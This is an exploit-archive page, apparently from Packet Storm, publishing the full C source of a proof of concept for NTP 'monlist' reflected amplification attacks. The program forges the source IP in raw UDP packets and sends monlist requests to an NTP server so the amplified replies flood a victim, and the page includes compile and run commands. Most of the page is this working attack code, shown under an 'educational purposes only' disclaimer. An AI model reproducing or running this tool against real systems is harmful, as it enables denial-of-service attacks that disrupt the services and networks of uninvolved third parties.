exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NTP Spoofed "monlist query" Denial Of Service Proof Of Concept

NTP Spoofed "monlist query" Denial Of Service Proof Of Concept
Posted Mar 19, 2014
Authored by Mark Osborne

NTP_SPQUERY.C is a spoofed "monlist query" program which can generate packets like those used in reflected amplification NTP attacks that were common in early 2014. Written entirely in C, it requires no special libs or header files. It has been designed to run on most LINUXs.

tags | exploit, denial of service, spoof, proof of concept
SHA-256 | b2921a12ef46feaba746bf166e1ad786a8a6d84e3174834a115c9770328ac219

NTP Spoofed "monlist query" Denial Of Service Proof Of Concept

Change Mirror Download
//   PROGRAM :   NTP_SPQUERY.c
//
// AUTHOR : loud-fat-bloke / MARK OSBORNE
//
// Description:
//
// REFLECTED AMPLIFICATION NTP ATTACK
//
// A well known security journal has asked me to do a piece on NTP ddos
// and being a bit reactionary (OCD in other words)
// I figured I would show that NTP and DNS DrdOS are related and conform to a common formulae.
// Therefore I have used the DNS_SPQUERY program I wrote 6 months ago to convert into NTP_SQUERY with minimal changes
//
// NTP_SPQUERY.C is an "monlist query" REFLECTED AMPLIFICATION NTP ATTACK that are common in March 2014
//
//
// As part of the charity project
// "CyberAttack CyberCrime CyberWarfare Cyber-Complacency"
//
// I have tried to use a book, youtube presentations, in person lectures and Android Apps to Highlight three key cyber points :
// 1 - that in europe a cyber attack by any group of proficient computer literate parties could cripple the infrastructure
// 2 - that formalised cyber security monitoring is required to prevent this - not militaristic, counter espionage initiatives
// which are hang overs from the cold ware
// 3 - Privacy campaigners generaly make things work by assuming "cyber security" monitoring fits into this
// espionage initiatives describes above
//
// charity project? - proceeds from the book, the APPs and personal appearances go to medical charity for sepsis awareness
//
//
// **** DO NO HARM WITH THIS PROGRAM *********
//
// the author has produced it for educational purposes only
//
//
/* to build and run me cut and paste the below 10 lines into your shell on a nice LINUX box
# compile me
#
gcc ntp_spquery.c -o ntp_spquery
#
# run me
# SPOOFED_S_IP NTP SERVER TARGET
./ntp_spquery 192.168.0.121 192.168.0.120
#
#
#
#
*/
char *pretty= "\n ---------------------------------------------------------------------------------- \n";
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <sys/socket.h>
#include <syslog.h>
#include <netinet/in.h>
#include <stdio.h>
int udpsockfd,n;

#define PROGRAM "NTP_SPQUERY"


//NTP header structure
struct NTP_HEADER
{
unsigned short id; // identification number

unsigned char li :2; //
unsigned char vn :3; //
unsigned char rb :1; //
unsigned char eb :1; //
unsigned char mb :1; //
unsigned char opcode :5;
unsigned char data[10] ; //
};

/*
char *pretyy= "\n \n DNS_SPQUERY - Amplification and Refelector \n\n from the book 'CyberAttack CyberCrime CyberWarefare Cyber-Complacency \n\n";
*/

char *pretyy= "\n \n NTP_SPQUERY - Amplification and Refelector \n\n from the book 'CyberAttack CyberCrime CyberWarefare Cyber-Complacency \n\n";
char *pretyz= " \tIs Hollywood's blueprint for Chaos coming true' by Mark Osborne\n \t ISBN-13: 978-1493581283 ISBN-10: 1493581287 \n\n";

unsigned char buf[4000];
int data_length ;

/*


# LeapIndicator = 0 , VersionNum = 3 or 2 , Mode = 3 (Client Mode)
#NTP v2 Monlist Request :
# data = "0x17,x00,x03,x2a,x00"
#NTP v3 Monlist Request :
# data = "0x1b,x00,x03,x2a,x00"
*/

// Define some constants.
#define IP4_HDRLEN 20 // IPv4 header length
#define UDP_HDRLEN 8 // UDP header length, excludes data

int
spoofudp (char *saddr,int sport, char *daddr, int dport, int datalen, char *udppacket)
{
int sd ;
const int on = 1;
struct ip iphdr, *iphdr_ptr;
struct udphdr udphdr, *udphdr_ptr;
unsigned char *data, *packet;
struct sockaddr_in sin;
unsigned char x[10000]; // the buffer
// Allocate memory for various headers and offsets.
packet = x ;
iphdr_ptr = x ;
// datalen = dnslength;
// UDP header ptr .
udphdr_ptr = (packet + IP4_HDRLEN);
// UDP data ptr .
data = (packet + IP4_HDRLEN + UDP_HDRLEN);
// UDP data -copy it at the end
memcpy (data , udppacket ,datalen );
// IPv4 header
iphdr_ptr->ip_hl =5;
iphdr_ptr->ip_v = 4;
iphdr_ptr->ip_tos = 0;
iphdr_ptr->ip_len = htons (IP4_HDRLEN + UDP_HDRLEN + datalen);
iphdr_ptr->ip_id = htons (0);
iphdr_ptr->ip_off = htons (0);
iphdr_ptr->ip_ttl = 255;
iphdr_ptr->ip_p = IPPROTO_UDP;
iphdr_ptr->ip_dst.s_addr = inet_addr (daddr );
iphdr_ptr->ip_src.s_addr = inet_addr (saddr ); /* SPOOOOPH di source IP */
iphdr_ptr->ip_sum = 0; //kernel do this please

// UDP header
udphdr_ptr->source = htons (sport);
udphdr_ptr->dest = htons (dport);
udphdr_ptr->len = htons (UDP_HDRLEN + datalen);
udphdr_ptr->check = 0; // hey misterkernal do your job for me
// zero ise sockeet data.
memset (&sin, 0, sizeof (struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = iphdr_ptr->ip_dst.s_addr;
// open a raw socket
if ((sd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror ("socket() failed ");
exit (2);
}
// unless the socket is set with IP_HDRINCL a random IP datagram will go
// out on the wire nearly all Linux kernals allow many bsd sun aix and hp dont
if (setsockopt (sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0) {
perror ("setsockopt() failed to set IP_HDRINCL ");
exit (3);
}
// Send packet.
if (sendto (sd, packet, IP4_HDRLEN + UDP_HDRLEN + datalen, 0, (struct sockaddr *) &sin, sizeof (struct sockaddr)) < 0) {
perror ("sendto() failed ");
exit (EXIT_FAILURE);
}
// Close socket descriptor.
close (sd);
}


usage ()
{
fprintf(stderr,"Program Usage: \n %s SOURCE_DOT_ADDR DEST_DOT_ADDR \n\n", PROGRAM);
exit(1);
}

unsigned char out[1000];
int len1 = 0, len2 = 0 ,len3 = 0 ;
int pants;

int
main( int argc , char *argv[])
{
char *out_temp;
if ( argc != 3 )
usage();
/* */ printf(pretyy ) ;
/* */ printf(pretyz ) ;
printf(" Spoof Source ip: \t \t %s \n Dest ip: \t \t %s \n \n \n ", argv[1] ,
argv[2] );
//
memset(buf,0x00,0xfF);
sprintf(buf,"%c%c%c%c%c", 0x17,0x00,0x03,0x2a,0x00);

data_length = 9 ;
printf(pretty ) ;
//
//
// my pretty
for (pants=0; pants < 30 ; pants++ )
printf("%x ", buf[pants]);
//

printf("\nNTP PACKET len \t \t %i \n" , data_length ) ;
//
// Writes out a spoofed UDP Packet
// written for my rfc 2827 survey which never got finished
//
spoofudp (argv[1] ,4950, argv[2] , 123 , data_length, buf );

return 0;
}
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close